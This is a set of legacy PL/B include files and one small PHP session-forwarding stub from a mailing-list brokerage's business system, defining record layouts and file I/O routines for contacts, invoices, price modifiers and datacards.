nmrgnnet form 8 394-401 new netout after repub hits
nmrgdpv form 8 402-409 DPV drops
nmrgdisa form 8 410-417 Disaster drops
nmrgcnr form 8 418-425 CNRS
nmrgfil2 dim 40 426-465 not used.
.nmrgfil2 dim 48 418-465 not used.
.
.END OF LIST
.
LISTEND
.
<file_sep>/DEVELOP/Includes - why/ncntdd.inc
......................................
.NCNTDD INCLUSION
.NIN Contact/Caller File Definition
.
.2013 August beef up sales portion change ncnt0001 to only use active records for dupe port check
.19 June 2012 add ninuser file data. will ultimately get rid of ninuser
.20May 2009 DLH add two bytes to hold Salesperson # to ultimately get rid of oslspern
.FILE NAME: NINCNT.DAT
.REC LENGTH: 135 FIXED
.INDEX KEY: (1) 001-002 (CNTNUM)
. (2) 063-065 (CNTPORT)
.
.AAMDEX KEY: (1) 003-037 (CNTNAME)
.
.NCNTNAME INIT "NINCNT"
.NCNTNME1 INIT "NINCNT"
.NCNTNME2 INIT "NINCNT2"
. NINCNT contact/caller file: 135-byte fixed records, multiple
. indexes (by contact #, port, initials, sales #) plus one AIM
. file by name; NCNTPATH selects the access path (see remark).
NCNTNAME INIT "NINCNT.aam|NINS1:502 "
NCNTNME1 INIT "NINCNT.isi|NINS1:502 "
NCNTNME2 INIT "NINCNT2.isi|NINS1:502"
NCNTNME3 INIT "NINCNT3.isi|NINS1:502"
NCNTNME4 INIT "NINCNT4.isi|NINS1:502"
NCNTFLIST FILELIST
NCNTFILE IFILE KEYLEN=2,FIXED=135,Name="NINCNT.isi|NINS1:502 "
NCNTFIL1 IFILE KEYLEN=3,FIXED=135,Name="NINCNT2.isi|NINS1:502"
NCNTFIL2 AFILE FIXED=135,Name="NINCNT.aam|NINS1:502 "
NCNTFIL3 IFILE KEYLEN=3,FIXED=135,Name="NINCNT3.isi|NINS1:502"
.Sales only programmer needs to check active status
NCNTFIL4 IFILE keylen=2,FIXED=135,Name="NINCNT4.isi|NINS1:502"
FILELISTEND
. Key work areas for the indexes above.
. NOTE(review): NCNTFLD2 is DIM 38 while CNTNAME is 35 bytes
. (003-037) - presumably the aamdex key spans extra bytes;
. verify before changing.
NCNTFLD DIM 2 CNTNUM (Primary Index)
NCNTFLD1 DIM 3 CNTPORT (Secondary Index)
NCNTFLD2 DIM 38 CNTNAME (Primary Aamdex)
NCNTFLD3 DIM 3 CNTINITS(Secondary Index)
NCNTFLD4 DIM 2 CNTSALES(Secondary Index)
NCNTFLAG FORM 1
NCNTFLG1 FORM 1
NCNTFLG2 FORM 1
NCNTPATH FORM 1 .1=cntnum,2=aim(left over),3=cntport,4=salesnumber
NCNTLOCK FORM 1
.
.
. CNTVARS: 135-byte contact record.
CNTVARS LIST
CNTNUM DIM 2 001-002 Contact # - KEY - duplicates allowed but only one should be active, zero filled
CNTNAME DIM 35 003-037 Contact Name
CNTPHONE DIM 25 038-062 Contact Phone # - Allows standard
. 14 digit #: "(XXX) XXX-XXXX" with possible extension #
CNTPORT DIM 3 063-065 Port # for Contact
CNTTEAM DIM 2 066-067 Team # for Contact
CNTRIGHTS DIM 1 068-068 Contact Rights: "1" - Access to ALL Contacts
. CNTRIGHTS2 not needed
. Modification of all Contacts, including Captains
. "2" - Captain - Access to all Team members
. CNTRIGHTS2 needed to access other Teams
. Modification only other Team Members
. "3" - Team - Access to all Team members
. CNTRIGHTS2 needed to access other Teams
. No modification allowed
. "4" - Individual - No outside access
. CNTRIGHTS2 needed to access other Contacts
. No modification allowed
CNTRIGHTS2 DIM 40 069-108 Accessible Outside Contacts
. Maximum of 20 extra Contacts (20 * 2byte CNTNUM = 40)
CNTPRINT FORM 1 109-109 Printer Default
CNTCNT FORM 1 110-110 "1" = Contact a valid Caller/Contact/Planner
.if cntcnt is not "1" this record will not display in the contact comboboxes in the order program(s)
CNTComp DIM 1 111-111 "1"=NIN, "2"=PLI Filler
.CNTFILLER DIM 25 111-135 Filler
.CNTFILLER DIM 24 112-135 Filler
CntSales Dim 2 112-113 two byte salesperson # from Oslspern.inc, zero filled
CntInactive Dim 1 114-114 ."Y" = Inactive Sales person
CntInactiv1 Dim 1 115-115 ."Y" = Inactive Contact
CNTINITS Dim 3 116-118
CNTFILLER DIM 17 119-135 Filler
LISTEND
.. .............................................................................
..CONTACT1/INC
.. .CONTACT TABLE USED FOR DISPLAY AND PRINT PROGRAMS
..
.OCNT DIM 40
.OCNT0 INIT "Billing(415) 291-5621"
.OCNT1 INIT "<NAME>(415) 291-5637"
.OCNT2 INIT "<NAME>(415) 291-5665"
..OCNT2 INIT "jennifer ost" left 9/92
..OCNT2 INIT "glendi henion"
..OCNT3 INIT "laura trupin"
.OCNT3 INIT "<NAME>(415) 291-5656"
..OCNT4 INIT "tina maultsby"
..OCNT4 INIT "catherine veyna"
..OCNT4 INIT "melinda rivera" 1/8/92
..OCNT4 INIT "stacey white" 3/2/93
.OCNT4 INIT "<NAME>(415) 291-5644"
..OCNT4 INIT "leola wong" 5/93
.OCNT5 INIT "<NAME>(415) 291-5669"
..OCNT5 INIT "<NAME>(415) 291-5669"
..OCNT5 INIT "jennifer post"
..OCNT5 INIT "marguerite salmon"
..OCNT5 INIT "<NAME>"
..OCNT5 INIT "derek glass"
..OCNT6 INIT "<NAME>"
..OCNT6 INIT "<NAME>"
.OCNT6 INIT "<NAME>(415) 291-5668"
..OCNT6 INIT "<NAME>(415) 291-5668" 11/10/97
..OCNT7 INIT "linda mietus"
..OCNT7 INIT "<NAME>(415) 291-5667" 12/98
..OCNT7 INIT "L<NAME>(415) 291-5667" 01/10/2000
.OCNT7 INIT "<NAME> (415) 291-5621"
..OCNT8 INIT "<NAME>"
..OCNT8 INIT "<NAME>"
..OCNT8 INIT "liora natelson"
..OCNT8 INIT "<NAME>(415) 291-5655" 4/1/98
..OCNT8 INIT "<NAME>(415) 291-5609"
.OCNT8 INIT "<NAME>(415) 291-5609"
..OCNT9 INIT "elizabeth corsale"
.OCNT9 INIT "Phoebe Fearing(415) 291-5667"
..OCNT9 INIT "<NAME>(415) 291-5638" 5/1/98
.OCNT10 INIT "<NAME>(415) 291-5640"
..OCNT11 INIT "<NAME>"
..OCNT11 INIT "<NAME>"
..OCNT11 INIT "<NAME>" .4/28/94
..OCNT11 INIT "<NAME>" .7/19/94
..OCNT11 INIT "<NAME>(415) 291-5640"
..OCNT11 INIT "<NAME>(415) 291-5603"
.OCNT11 INIT "<NAME>(415) 291-5647"
..OCNT12 INIT "marg<NAME>" cold calls
.OCNT12 INIT "<NAME>(415) 291-5643"
..OCNT13 INIT "yol<NAME>"
..OCNT13 INIT "<NAME>"
..OCNT13 INIT "<NAME>" left sales 7/93.
..OCNT13 INIT "kathleen pavao"
..OCNT13 INIT "<NAME>(415) 291-5657" 5/31/98
.OCNT13 INIT "Be<NAME>avez(415) 291-5657" 08/04/98
..OCNT14 INIT "<NAME>"
.OCNT14 INIT "<NAME>(415) 291-5642"
..OCNT15 INIT "kim kouri"
.OCNT15 INIT "<NAME>(415) 291-5663"
..OCNT15 INIT "<NAME>"
.OCNT16 INIT "<NAME>(415) 291-5662"
.OCNT17 INIT "<NAME>(415) 291-5658"
.Modified Contact: 08 <NAME> to <NAME> 07/31/2000 by <NAME>
.Modified Contact: 23 <NAME> to <NAME> 07/31/2000 by <NAME>
.Modified Contact: 34 Meg Plaza to Nancy La Shell 08/25/2000 by <NAME>oto
.Modified Contact: 21 <NAME> to Spare 10/09/2000 by <NAME>
.Modified Contact: 17 <NAME> to <NAME> 10/09/2000 by <NAME>
.Modified Contact: 28 <NAME> to <NAME> 10/09/2000 by <NAME>
.Modified Contact: 05 <NAME> to Spare 10/11/2000 by <NAME>
.Modified Contact: 07 <NAME> to <NAME> 10/11/2000 by <NAME>
.Modified Contact: 05 Spare to Tami Frost 10/26/2000 by <NAME>
.Modified Contact: 02 <NAME> to <NAME> 10/31/2000 by <NAME>
.Modified Contact: 16 <NAME> to <NAME> 10/31/2000 by <NAME>
.Modified Contact: 21 Spare to <NAME> 11/13/2000 by <NAME>
.Modified Contact: 15 <NAME> to <NAME> 11/15/2000 by <NAME>
.Modified Contact: 22 <NAME> to <NAME> 03/09/2001 by <NAME>
.Modified Contact: 29 <NAME> to <NAME> 09/04/2001 by <NAME>
.Modified Contact: 06 <NAME> to <NAME> 10/01/2001 by <NAME>
.Modified Contact: 17 <NAME> to <NAME> 10/02/2001 by <NAME>
.Modified Contact: 03 <NAME> to Not Currently Used 04/08/2002 by <NAME>
.Modified Contact: 41 <NAME> to Not Currently Used #2 04/08/2002 by <NAME>
.Modified Contact: 34 Nancy La Shell to Nancy LaShell 04/26/2002 by <NAME>
.Modified Contact: 39 <NAME> to <NAME> 04/29/2002 by <NAME>
.Modified Contact: 31 <NAME> to <NAME> 08/09/2002 by <NAME>
.Modified Contact: 07 <NAME> to Ann Lovi 09/03/2002 by <NAME>
.Modified Contact: 17 <NAME> to Janice Rounds 02/11/2003 by Diego Montoya
.Modified Contact: 17 <NAME> to <NAME> 05/23/2003 by Diego Montoya
.Modified Contact: 30 <NAME> to Sandra Inouye 06/11/2003 by Mr Batch
.Modified Contact: 30 <NAME> to Sandra Inouye 06/11/2003 by Mr Batch
.Modified Contact: 48 List Management to List Management Clearances 08/11/2003 by <NAME>
.Modified Contact: 17 <NAME> to <NAME> 08/22/2003 by Diego Montoya
.Modified Contact: 13 <NAME> to <NAME> - Sales 10/22/2003 by Diego Montoya
.Modified Contact: 50 <NAME> to available 10/23/2003 by <NAME>
.Modified Contact: 13 <NAME> - Sales to Becky Chavez 10/23/2003 by <NAME>
.Modified Contact: 50 available to Sue Adams 11/06/2003 by Diego Montoya
.Modified Contact: 36 <NAME> to <NAME> 04/16/2004 by <NAME>
.Modified Contact: 55 <NAME> to <NAME> 01/14/2005 by Diego Montoya
.Modified Contact: 55 <NAME> to <NAME> 01/26/2005 by Diego Montoya
.Modified Contact: 58 <NAME> to <NAME> 03/14/2005 by Diego Montoya
.Modified Contact: 62 <NAME> to <NAME> 10/31/2005 by <NAME>
.Modified Contact: 62 <NAME> to <NAME> 11/21/2005 by Diego Montoya
.Modified Contact: 65 <NAME>-Hassan to Ruka ALHassan 03/16/2006 by Diego Montoya
.Modified Contact: 82 <NAME> to <NAME> 05/30/2007 by <NAME>
.Modified Contact: 82 <NAME> to <NAME> 06/05/2007 by <NAME>
.Modified Contact: 48 List Management Clearances to List Management Clearances NIN 10/11/2007 by <NAME>
.Modified Contact: 72 <NAME> to <NAME> 01/07/2008 by <NAME>
.Modified Contact: 73 <NAME> to <NAME> 01/07/2008 by <NAME>
.Modified Contact: 03 Not Currently Used to Front Desk 03/11/2011 by <NAME>
.Modified Contact: 23 <NAME> to <NAME> 04/17/2012 by <NAME>
.Modified Contact: 41 Not Currently Used #2 to <NAME> 04/17/2012 by <NAME>
.Modified Contact: 43 Telecomm to Pia Payne 06/30/2012 by <NAME>
.Modified Contact: 01 Billing to Cold Calls LM 08/16/2013 by <NAME>
<file_sep>/DEVELOP/Includes - why/nmodBdd.inc
******************************************************
* NModBDD INCLUSION
* PRICE MODIFIER FILE FOR DATACARD SUBSIDIARY FILES
* PRICE MODIFIER FILE DESCRIPTOR.
. ....................................................
* ****************************************************
* NAMES IN THE NEWS MASTER PRICE MODIFIER FILE.
* ****************************************************
.
. FILE: NINModB
. LENGTH: 60
. TYPE: AIM,ISAM,MANAGED
. INDEX KEY: 1-3 NModBNUM
.AIMDEX KEY: 4-23 NModBDESC
......................................................
. NINModB price-modifier file: ISAM + AIM pair, 60-byte fixed.
. NOTE(review): KEYLEN=9 here, but this include's header
. documents the index key as bytes 1-3 (and NModBFLD is DIM 3) -
. confirm the actual key length before relying on either.
NModBNAME INIT "NINModB"
NModBFLIST FILELIST
NModBFILE IFILE KEYLEN=9,FIXED=60,Name="NINModB.isi|NINS1:502"
NModBFLE2 AFILE FIXED=60,Name="NINModB.aam|NINS1:502"
FILELISTEND
.
NModBLOCK FORM 1 0 OR 1=filepi,2=recordlock, 3=no lock
NModBFLD DIM 3
NModBFLD1 DIM 23
NModBFLAG FORM 1
NModBPATH FORM 1
.
. NModBVARS: 60-byte record; DESC/CALC code values documented
. in the remarks below (code NNN selects both texts in tandem).
NModBVARS LIST
NModBNUM DIM 3 1-3 PRICE MODIFIER NUMBER
NModBDESC DIM 20 4-23 PRICE MODIFIER DESCRIPTION
. " " OR "000" NO DESCRIPTION/CALCULATION
. "001" /M
. "002" /FLAT
. "003" /EACH
. "004" /MIN
. "005" N/A
. "006" N/C
. "007" SEEBASE
. "008" SEEDESC
. "009" INQUIRE
NModBCALC DIM 20 24-43 PRICE MODIFIER CALCULATION
. " " OR "000" NO DESCRIPTION/CALCULATION
. "001" /1000
. "002"
. "003" *1
. "004"
. "005"
. "006" *0
. "007"
. "008"
. "009"
NModBStamp Dim 17 44-60
LISTEND
<file_sep>/DEVELOP/robb htt/foward.php
<html>
<?php
// Forwarding stub: re-emits the session id (SID) received via POST
// into a hidden form that targets the PL/B login handler.
// NOTE: debug echoes of cgiusername/cgipassword stay commented out
// so credentials are never written to the page.
// print ("\$_POST['cgiusername'] on an external page called with include is: " . $_POST['cgiusername']);
// print ("\$_POST['cgipassword'] on an external page called with include is: " . $_POST['cgipassword']);

// Quote the array key: a bareword key ($_POST[SID]) is a fatal
// "undefined constant" Error in PHP 8. Tolerate a missing SID and
// escape before embedding in HTML output / an attribute value to
// prevent reflected XSS and broken markup.
$sid = isset($_POST['SID']) ? (string) $_POST['SID'] : '';
$safeSid = htmlspecialchars($sid, ENT_QUOTES, 'UTF-8');
print ("\n\$_POST[SID] on an external page called with include is: " . $safeSid);
?>
<form name='LoginForm' method='post' action='/plb-bin/login.plc'>
<input type='hidden' name='SID' value='<?php print $safeSid; ?>' />
</form>
<script language=javascript>
</script>
</html>
<file_sep>/DEVELOP/Includes - why/NMDCMSCDD.INC
.******************************************************
.* MIN List FILE DESCRIPTORS.
.. ....................................................
.* ****************************************************
.* MIN DATACARD FILES.
.* ****************************************************
.
. Include-only member: record layout for the NMDC_MSC file,
. a MIN-sourced datacard subsidiary holding addressing and
. order-line text (two 25/30-byte lines per category).
.
. FILE: NMDC_MSC
. LENGTH: Fixed
. COMPRESS: NONE
. TYPE: Isam
......................................................
. LAST MODIFIED
. patch 1.0 14 August 2006 DLH New
.Main file
.MDCMaindd
.Secondary FIles See
.MDCSEGDD - Segment info universe & $
.MDSMSCDD - Misc addressing Min, UOS,Gender,Media,net
.MDC035DD - CAtegory
.MDC091DD - Owner ???? data no supplied
.MDC090DD - Owner
.MDCTXTDD - Text
......................................................
NMSCNAME Init "NMDC_MSC.Isi|NINS1:502"
NMSCFILE IFILE Name="NMDC_MSC.Isi|NINS1:502"
NMSCSFILE FILE
NMscFld Dim 6
NMSCFLAG FORM 1
NMSCPATH FORM 1
.
.Field names below intentionally mirror MIN's own names (see
.the list header comment) to ease cross-referencing.
NMSCVARS LIST .for ease I am using Min's names
NDDCNO Dim 6 1-6 NIN Card#
NDAD1 Dim 30 7-36 Addressing 1
NDAD2 Dim 30 37-66 Addressing 2
NDMO1 Dim 25 67-91 Min order line 1
NDMO2 Dim 25 92-116 Min order line 2
NDUS1 Dim 25 117-141 UNit of Sale line 1
NDUS2 Dim 25 142-166 UNit of Sale line 2
NDSX1 Dim 25 167-191 Gender Line 1
NDSX2 Dim 25 192-216 Gender Line 2
NDMD1 Dim 25 217-241 Media Line 1
NDMD2 Dim 25 242-266 Media Line 2
NDRS1 Dim 25 267-291 Net Name Line 1
NDRS2 Dim 25 292-316 Net Name Line 2
NDDLT Dim 1 317-317 'A'ctive/'I'nactive
ListEnd
<file_sep>/include/Mindd.inc
******************************************************
* MIN List FILE datacard x ref DESCRIPTORS.
. ....................................................
* ****************************************************
* MIN DATACARD FILES.
* ****************************************************
.
. Include-only member: cross-reference file mapping NIN list
. numbers to MIN list numbers (two ISAM views, one per key).
.
. FILE: Min2NIN
. LENGTH: 20
. COMPRESS: NONE
. TYPE: Isam
......................................................
. LAST MODIFIED
. patch 1.0 14 August 2006 DLH New
;Secondary FIles See
......................................................
MinXNAME DIM 8
MinXFILE IFILE KeyLen=6,FIXED=20,Name="Min2NIN.ISI|NINS1:502"
MinXFILE2 IFILE KEYlen=6,FIXED=20,Name="Min2NIN2.ISI|NINS1:502"
.NOTE(review): the next two labels differ only in case
.(MinXFLd / MinXFLD); if this dialect treats labels
.case-insensitively that is a duplicate definition --
.confirm and rename one (e.g. MinXFLD1) if so.
MinXFLd Dim 6 .NIN list number 1
MinXFLD Dim 6 .min List number
MinXFLAG FORM 1
MinXPATH FORM 1
.
MinVARS LIST
MInxNIN DIM 6 1-6 datacard number
MinxFill Dim 1 7-7
MinxMIN Dim 6 8-13 Min #
minXFIll2 Dim 7 14-20
LISTEND
<file_sep>/include/MDCTXTDD.INC
.* MIN List FILE DESCRIPTORS.
.. ....................................................
.* ****************************************************
.* MIN DATACARD FILES.
.* ****************************************************
.
. Include-only member: datacard free-text file (two ISAM
. views plus an AIM view) keyed by card number + sequence.
.
. FILE: MDC_MTXT
. LENGTH: Variable
. COMPRESS: NONE
. TYPE: FLAT Comma Delimited
.NOTE(review): header says MDC_MTXT / variable / comma
.delimited, but the declarations below open MDC_TXT.* with
.FIXED=62 -- header appears stale; confirm before trusting it.
......................................................
. LAST MODIFIED
.Patch 1.1 18 March 2008 DLH add Aam
. patch 1.0 14 August 2006 DLH New
.Main file
.MDCMaindd
.Secondary FIles See
.MDCSEGDD - Segment info universe & $
.MDSMSCDD - Misc addressing Min, UOS,Gender,Media,net
.MDCTXTDD - CAtegory
.MDC091DD - Owner ???? data no supplied
.MDCTXTDD - Owner
.MDCTXTDD - Text
......................................................
MTXTNAME INIT "MDC_TXT.Isi|NINS1:502"
MTXTNAME2 INIT "MDC_TXT2.Isi|NINS1:502"
MTXTNAME3 INIT "MDC_TXT.AAM|NINS1:502"
MTXTFLIST FileList
MTXTFILE IFILE Name="MDC_TXT.Isi|NINS1:502"
MTXTFILE2 IFILE Name="MDC_TXT2.Isi|NINS1:502"
MTXTFILE3 AFILE Fixed=62,Name="MDC_TXT.AAM|NINS1:502"
FileListEnd
MTXTSFILE FILE
.MTXTSFILE FILE Name="MDC_TXT.csv"
MTXTFLAG FORM 1
MTXTPATH FORM 1
MTXTFLD Dim 6
MTXTFLD2 Dim 10 card + Seq
MTXTFLD3 Dim 53 TExt plus key info
.
.Primary layout: TGSQNO is numeric (FORM 4).
MTXTVARS LIST .for ease I am using Min's names
TXDCNO Dim 6 1-6 Card#
TGSQNO Form 4 7-10 Seq #
TXTTYP DIM 1 11-11 TYpe of text code
TXTLIN Dim 50 12-62 TEXT
ListEnd
.Alternate character layout over the same record: CTGSQNO is
.DIM (character) rather than FORM; CTXTLIN occupies 12-61.
MTXTVARS1 LIST .for ease I am using Min's names
CTXDCNO Dim 6 1-6 Card#
CTGSQNO dim 4 7-10 Seq #
CTXTTYP DIM 1 11-11 TYpe of text code
CTXTLIN Dim 50 TEXT
ListEnd
<file_sep>/include/ORDFDINV.INC
. *****************************************************************************
.
. Include-only member: invoice record layout for NININV/CMPINV,
. keyed by LR number. IC1..IC0 / IA1..IA0 are ten parallel
. additional-charge code/amount pairs.
.
. FILE: NININV/CMPINV
. LENGTH: 256
. COMPRESS: NONE
. TYPE: ISAM
. KEY: ILR
.
. *****************************************************************************
.
INVOICE IFILE KEYL=6
.
IKEY DIM 6
.
ICD DIM 1 CODE
IST DIM 1 STATUS
IMN DIM 4 MAILER NUMBER
ILR DIM 6 LR NUMBER
IBT DIM 1 BILL-TO
IPT DIM 1 PAY-TO
ILI DIM 6 LIST OWNER INVOICE NUMBER
IP1 FORM 7 LIST OWNER AP
ICP FORM 2 COMMISSION PERCENT
IPC DIM 1 PAYABLE CODE
IQT FORM 7 QUANTITY SHIPPED
IPR FORM 5 PRICE/M
ICT DIM 3 CONTACT NUMBER
IIC DIM 1 INCOME CODE
ILO DIM 4 LIST OWNER NUMBER
IN2 DIM 6 CHECK NUMBER 2
IDJ DIM 1 WSJ PAYMENT CODE
IAC DIM 1 ADJUSTMENT CODE
IN1 DIM 6 CHECK NUMBER 1
IKD DIM 6 CHECK DATE
I90 DIM 1 OVER 90 DAY LETTER CODE
IMP FORM 7 MAILER PAYMENT RECEIVED
IDP DIM 6 DATE OF MAILER PAYMENT
IIN DIM 6 INVOICE NUMBER
IID DIM 6 INVOICE DATE
IC1 DIM 2 ADD CHRG CODE 1
IA1 DIM 12 ADD CHRG AMOUNT 1
IC2 DIM 2
IA2 DIM 12
IC3 DIM 2
IA3 DIM 12
IC4 DIM 2
IA4 DIM 12
IC5 DIM 2
IA5 DIM 12
IC6 DIM 2
IA6 DIM 12
IC7 DIM 2
IA7 DIM 12
IC8 DIM 2
IA8 DIM 12
IC9 DIM 2
IA9 DIM 12
IC0 DIM 2 ADD CHRG CODE 10
IA0 DIM 12 ADD CHRG AMOUNT 10
IGP DIM 1 GUARANTEED PAYMENT CODE
IAR FORM 9 ACCOUNTS RECEIVABLE
ISC DIM 1 SALESMAN CODE
IP2 FORM 9 A/P 2
<file_sep>/include/Brptdd.inc
..............................................................................
.
. BrptDD INCLUSION
. Bankruptcy FILE DEFINITION
.
. Include-only member: 12-byte records pairing an LR number
. with an invoice number; two ISAM views, one per key order.
.
. FILE NAME : BankRuptcy
. REC LENGTH: 12 FIXED
. INDEX KEY : 1-6,7-12 (LR# ,INVOICE#)
.
.Patch 1.0 NEW July 2008
BrptLIST Filelist
BrptFILE IFILE KEYLEN=6,FIX=12,UNCOMP,Name="Bankruptcy.ISI|NINS1:502 "
BrptFLE2 IFILE KEYLEN=6,FIX=12,UNCOMP,Name="Bankruptcy2.ISI|NINS1:502 "
Filelistend
BrptFLSQ FILE
BrptNAME INIT "Bankruptcy.ISI|NINS1:502 "
BrptNAMESEQ INIT "Bankruptcy.Dat|NINS1:502 "
BrptFLD DIM 6
BrptFLD1 DIM 6
BrptFLAG FORM 1
BrptPath FORM 1 "1" by lr , "2" by inv inv not implemented yet
.
Brptvars list
BrptLR DIM 6 001-006 LR #
BrptINv DIM 6 007-012 INV #
listend
<file_sep>/include/NInvAcdIO.inc
...............................................................................
..
.. NINVACDIO INCLUSION
.. I/O routines for the NIN invoice ACD (additional charge) file.
...............................................................................
.
. ENTRY POINT : NINVACDKEY
. REQUIRED : 'NINVACDFLD'
. RETURNED : INVOICE ACD RECORD
. DESCRIPTION : EXACT ISAM KEY READ
.
NINVACDKEY
BRANCH ninvACDFlag TO ninvACD1
.Bug fix: this entry previously did CALL NINVOPEN, which opens a
.different file and never sets ninvACDFlag, so NINVACDFILE stayed
.unopened on first use. Every other entry point in this inclusion
.opens via NInvAcdOPEN; do the same here.
CALL NInvAcdOPEN
NINVAcd1 FILEPI 1;NINVACDFILE
READ NINVACDFILE,NINVACDFLD;INVACDVARS
return
...............................................................................
.
. ENTRY POINT : NInvAcdTST
. REQUIRED : NInvAcdFLD
. RETURNED :
. DESCRIPTION : TEST KEY (reads into str1 only; record vars untouched)
.
NInvAcdTST Branch NinvAcdFlag to NinvAcd2
CALL NInvAcdOPEN
NInvAcd2 FILEPI 1;NInvAcdFILE
READ NInvAcdFILE,NInvAcdFLD;str1;
RETURN
...............................................................................
.
. ENTRY POINT : NInvAcdKS
. REQUIRED : '' (a prior positioning read)
. RETURNED : INVOICE RECORD
. DESCRIPTION : KEY SEQUENTIAL INVOICE FILE READ
.
NInvAcdKS Branch NinvAcdFlag to NINvAcd3
CALL NInvAcdOPEN
NInvAcd3 FILEPI 1;NInvAcdFILE
READKS NInvAcdFILE;INVAcdVARS
.
RETURN
...............................................................................
.
. ENTRY POINT : NInvAcdSEQ
. REQUIRED :
. RETURNED : INVOICE ACD RECORD
. DESCRIPTION : SEQUENTIAL INVOICE FILE READ
.
NInvAcdSEQ BRANCH NInvAcdFLAG TO NInvAcd4
CALL NInvAcdOPEN
NINVACD4 FILEPI 1;NInvAcdFILE
READ NInvAcdFILE,SEQ;INVACDVARS
RETURN
...............................................................................
.
. ENTRY POINT : NInvAcdWRT
. REQUIRED : 'NInvAcdFLD',
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT.
.
NInvAcdWRT bRANCH NinvAcdFlag to NinvAcd5
CALL NInvAcdOPEN
NInvAcd5 FILEPI 1;NInvAcdFILE
WRITE NInvAcdFILE,NInvAcdFLD;INVACDVARS
.
RETURN
.
...............................................................................
.
. ENTRY POINT : NInvAcdUPD
. REQUIRED : A PREVIOUS KEY READ,
. RETURNED :
. DESCRIPTION : KEY UPDATE INVOICE ACDFILE
.
NInvAcdUPD Branch NInvacdflag to NinvAcd6
CALL NInvAcdOPEN
NInvAcd6 FILEPI 1;NInvAcdFILE
UPDATE NInvAcdFILE;INVACDVARS
RETURN
...............................................................................
.
. ENTRY POINT : NInvAcdDEL
. REQUIRED : 'NInvAcdFLD'
. RETURNED :
. DESCRIPTION : PATH=1 DELETES TeXT & ALL KEYS.
. Verifies the key exists (NInvAcdtst) before deleting.
.
NInvAcdDEL BRANCH NInvAcdFlag TO NInvAcd7
.
CALL NInvAcdOPEN
NInvAcd7 CALL NInvAcdtst ;ensure valid position in file
RETURN IF OVER
FILEPI 1;NInvAcdFILE
DELETE NInvAcdFILE,NInvAcdFLD
RETURN
.
...............................................................................
.
. ENTRY POINT : NInvAcdOPEN
. REQUIRED :
. RETURNED : 'NInvAcdFLAG' SET TO 1 if opened
. DESCRIPTION : OPEN NIN INVOICE ACD FILE
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
. Closes first when the flag shows a previous open.
.
NInvAcdOPEN
TRAP NInvAcdGONE IF IO
BRANCH NInvAcdFLAG OF NInvAcdCLOS,NInvAcdCLOS
GOTO NInvAcdOPN1
NInvAcdCLOS CLOSE NInvAcdFILE
NInvAcdOPN1 OPEN NInvAcdFILE,NInvAcdNAME
TRAPCLR IO
TRAP IOmssg GIVING ERROR IF IO
MOVE c1 TO NInvAcdFLAG
RETURN
................................................................................
.IO trap target: report the missing file, then fall through
.into FILEGONE (no RETURN here -- presumably FILEGONE aborts
.or transfers control; confirm in its source).
NInvAcdGONE MOVE NInvAcdNAME TO FILENAME
CALL FILEGONE
.
................................................................................
.Clear all 15 in-memory ACD table entries (blanks for DIMs,
.zero for numeric FORM fields).
NInvAcdRecClear
FOR AcdRecCount,"1","15"
Clear NInvAcdRec(AcdRecCount).NinvAcdNumRec
Clear NInvAcdRec(AcdRecCount).NinvAcdCodeRec
MOve c0 to NInvAcdRec(AcdRecCount).NinvAcdRateRec
MOve c0 to NInvAcdRec(AcdRecCount).NInvAcdPercRec
MOve c0 to NInvAcdRec(AcdRecCount).NInvAcdQtyRec
Clear NInvAcdRec(AcdRecCount).NINVAcdANINCDRec
Clear NInvAcdRec(AcdRecCount).NINvAcdAextcdRec
Clear NInvAcdRec(AcdRecCount).NinvAcdRateTRec
Clear NInvAcdRec(AcdRecCount).NINvAcdTotalRec
Clear NInvAcdRec(AcdRecCount).NINvAcdDescRec
repeat
Return
................................................................................
.NInvAcdRecLoad - load up all ACD records
.Requires - prepositioning in the Isam file so readks can be used
. - NinvAcdRec empty see clear routine above
. - and valid Invnum value from invoice read
.Stops at end-of-file or at the first record belonging to a
.different invoice (keys are read in sequence).
NInvAcdRecLoad
FOR AcdRecCount,"1","15"
call NInvAcdKS
If over
Break
endif
IF (invnum = NInvAcdINV)
MOve NinvAcdNum to NInvAcdRec(AcdRecCount).NinvAcdNumRec
MOve NinvAcdCode to NInvAcdRec(AcdRecCount).NinvAcdCodeRec
MOve NinvAcdRate to NInvAcdRec(AcdRecCount).NinvAcdRateRec
MOve NInvAcdPerc to NInvAcdRec(AcdRecCount).NInvAcdPercRec
MOve NINVAcdANINCD to NInvAcdRec(AcdRecCount).NINVAcdANINCDRec
.begin patch 1.3
.NOTE(review): the next MOve is immediately overwritten by the
.if/else below -- redundant but harmless.
MOve NINVAcdQty to NInvAcdRec(AcdRecCount).NINVAcdQtyRec
if (AdjCalcFlag = YES) .calling from adjustment program with change in qty in N9
.if adjustment calc we forced new qty to qtybild
.DO NOT RESAVE RECORD WITH THESE Values in the table
MOve QtyBild to NInvAcdRec(AcdRecCount).NINVAcdQtyRec
Else
MOve NINVAcdQty to NInvAcdRec(AcdRecCount).NINVAcdQtyRec
endif
.end patch 1.3
MOve NinvAcdAextcd to NInvAcdRec(AcdRecCount).NinvAcdAextcdRec
Move NINvAcdRateT to NInvAcdRec(AcdRecCount).NinvAcdRateTRec
else
break
endif
repeat
NInvAcdRecLoadExit
return
................................................................................
<file_sep>/include/nxngdd.inc
;* NXNGDD/INC.
;* *****************************************************************************
;* NAMES IN THE NEWS MASTER EXCHANGE ACCOUNT FILE.
;* *****************************************************************************
;.
;. FILE: NINXNUM
;. LENGTH: 30
;.COMPRESS: NONE
;. TYPE: AIM
;. KEY: ACCKEY MLR1,MLR2 1-6,7-12
;...............................................................................
.Need to add 100 byte note field
;. revision:
...08 February 2010 DLH NXNGLock
;..13Jul98 DLH ADD flag AND DATE FOR purpose of allowing ACCOUNT Inactivation.
. Patch 1.1 31JAN05 ASH Increased Mailer fields
;.
;...............................................................................
;.
.Everything in the block below is the pre-patch-1.1 22-byte
.layout, kept commented out for reference only. The active
.declarations (30-byte record, 12-byte ACCKEY) start at
.NXNGNAME further down.
.START PATCH 1.1 REPLACED LOGIC
.;NXNGNAME INIT "NINXNUM "
.NXNGNAME INIT "NINXNUM.AAM|20.20.30.103:502"
.NXNGFLD1 DIM 7
.NXNGFLD2 DIM 7
.NXNGFILE AFILE FIXED=22
.NXNGFLAG FORM 1
.ACKEY DIM 8 HOLDS ACCKEY FOR CHECK AFTER READ.
.. .............................................................................
..
.. ..ACCOUNT MASTER
..
